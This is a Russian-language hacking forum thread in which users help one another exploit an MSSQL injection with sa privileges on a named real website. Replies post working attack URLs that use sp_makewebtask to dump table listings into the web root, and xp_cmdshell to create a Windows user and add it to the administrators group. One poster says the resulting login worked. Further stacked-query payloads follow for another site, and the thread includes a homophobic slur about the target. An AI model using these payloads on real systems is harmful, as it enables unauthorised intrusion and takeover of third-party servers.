mssql inj вопрос для гуру

Здравствуйте помогите понять почему неработают некоторые фишки mssql
для примера взял инъекцию на сайте пидоров

тут sql-inj с правами sa

Syntax error converting the nvarchar value 'sa' to a column of data type int.

хочу добавить юзера через xp_cmdshell

выдаёт Incorrect syntax near 'net'.
что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный

пробую зделать дамп таблиц через sp_makewebtask

тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом

Incorrect syntax near the keyword 'order'.

тут что я нетак делаю?

путьдо веб директории в ошибке взял
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'.

The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qry_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\current.cfm: line 1
Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qry_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\current.cfm: line 1

P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa

 

Тебе ошибка в явном виде вываливается, надо лишь немного подумать (заглушить ордер):

Code:

http://cybersocket.com/current/current.cfm?issue_id=1;+EXEC+master..sp_makewebtask+%22C:\Inetpub\wwwroot\www.cybersocket.com\includes\output.html%22,%22SELECT+*+FROM+INFORMATION_SCHEMA.TABLES%22;+select+c.id,c.category+from+tbl_issue_category+ic,tbl_category+c,tbl_article+a+where+ic.category=a.category+and+ic.issue=a.issue+and+ic.category=c.id+and+ic.issue=1

Здесь все таблицы
http://cybersocket.com/includes/output.html

а здесь можешь посмотреть все колонки
http://cybersocket.com/includes/output5.html

ЗЫ
Юзверя создавать не буду, надеюсь сам дальше разберешься, а то совсем непохек получится =\
ЗЗЫ
Ток там при добалении юзверя не забудь вместо ' поставить "(%22)

 

спасибо большое,как бы с тобой пообщаться в icq ? время много неотнему и глупыми вопросами доставать небуду...напиши в пм свою асю плз

 

с юзером пробовал и так как ты написал(до создания тут темы ещё),неработает почему-то...может у меня руки неоттуда ростут) ну нетолько с этой багой такие проблемы

 

ну тебе же сказали надо order by нетрализовать

Code:

http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20user%20test1%20hacker%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a

Code:

http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20localgroup%20administrators%20test1%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a

зы пробовал приконнектится... все работает

 

да всё ок!
чёто я тупанул немного,спасибо

 

нашёл ещё одну inj с правами sa там там возникает такая ошибка при подстановке -1'

site.com/index.asp?id=1;exec%20master..xp_cmdshell%20%20%22net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22--

site.com/index.asp?id=1';exec%20master..xp_cmdshell%20%20%22net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22--

пытаюсь сам думать но недогоняю) подскажите плз
как я понял тут в одной переменной скрипта id передаются два запроса к базе и нужно правильно вставить свой запрос и второй запрос закрыть (может конечно я глупость сказал )
так ещё пробовал

site.com/bug.asp?ID=1';exec%20master..xp_cmdshell%20%20net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22;1';--

непонял ещё

что тут тип нужно чтоли указывать...подскажите тогда как это зделать?

 

здесь: site.com/index.asp?id=1;exec.... после 1 попробуй поставь поставь ковычку

вот так попробуй:

Code:

site.com/index.asp?id=1';exec%20master..xp_cmdshell%20' net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add

 

Вообще тему имхо пора закрывать, для скулей есть отдельная тема, туда и выкладывай, там тебе быстро помогут. А вообще больше становится похожим на просьбы о взломе =\

 

где отдельная тема по скулям дай линк
я не прошу чтоб мне кто-то что-то взламывал, я хочу сам понять почему у меня неполучается составить правильный запрос к базе прежде чем что-то спрашивать я сам пробую по всякому и инфу везде где только можно ищу по теме и потом только спрашиваю у вас

 

https://forum.antichat.ru/thread21336.html

 

Млин, ну не просьбы здесь.Здесь отписываем уязвимости =\